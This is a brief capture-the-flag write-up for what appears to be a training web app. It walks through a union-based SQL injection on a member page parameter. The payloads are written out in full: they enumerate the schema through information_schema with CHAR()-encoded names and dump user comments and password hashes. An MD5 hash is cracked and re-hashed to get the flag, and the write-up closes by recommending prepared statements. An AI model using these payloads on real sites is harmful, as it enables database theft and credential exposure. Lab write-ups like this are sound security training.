in /?page=member
1 UNION SELECT 1, database()
we can see TABLE_SCHEMA = Member_Sql_Injection
1 UNION SELECT 1, TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = CHAR(77,101,109,98,101,114,95,83,113,108,95,73,110,106,101,99,116,105,111,110)
(the char is Member_Sql_Injection in ascii)
we can see TABLE_NAME = users
1 UNION SELECT 1, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = CHAR(77,101,109,98,101,114,95,83,113,108,95,73,110,106,101,99,116,105,111,110) AND TABLE_NAME = CHAR(117,115,101,114,115)
we can see COLUMN_NAME are user_id, first_name, last_name,town, country, planet, commentaire, countersign
1 UNION SELECT commentaire, countersign from users
Decrypt this password -> then lower all the char. Sh256 on it and it's good !
5ff9d0165b4f92b14994e5c685cdce28
its MD5 for FortyTwo
sh256 and we get the flag
3b4e8a30ecbfde518f50f2bda1912b40338ecd71821faeb1e9cdf44cefff95f5

possible resolution:
use prepared request to clean data sent by the user
